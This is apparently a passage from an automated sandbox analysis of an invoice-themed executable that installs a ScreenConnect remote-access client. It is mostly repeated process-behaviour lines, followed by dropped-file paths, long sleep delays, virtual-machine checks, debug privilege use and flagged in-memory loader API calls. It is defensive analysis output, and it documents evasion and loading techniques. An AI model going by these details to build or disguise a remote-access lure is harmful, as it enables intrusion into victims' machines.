                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeMemory allocated: 3480000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeMemory allocated: 3520000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeMemory allocated: 5520000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeMemory allocated: 6DF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeMemory allocated: 64D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeMemory allocated: 7DF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeMemory allocated: 8DF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeMemory allocated: 6DF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeMemory allocated: 9080000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeMemory allocated: A080000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 1070000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 1AA0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 3AA0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 1AFF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 1A6F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2E03.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI29CB.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI22D5.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exe TID: 7560Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe TID: 8008Thread sleep count: 47 > 30Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe TID: 8172Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: 5d26dc.msi.3.drBinary or memory string: VMCi-
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2613414732.00000000041A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 0.2.invoice-benefits-agency9-24-2024.exe.5cc0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.2.invoice-benefits-agency9-24-2024.exe.5cc0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                              Source: 0.2.invoice-benefits-agency9-24-2024.exe.5cc0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.2.invoice-benefits-agency9-24-2024.exe.5cc0000.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
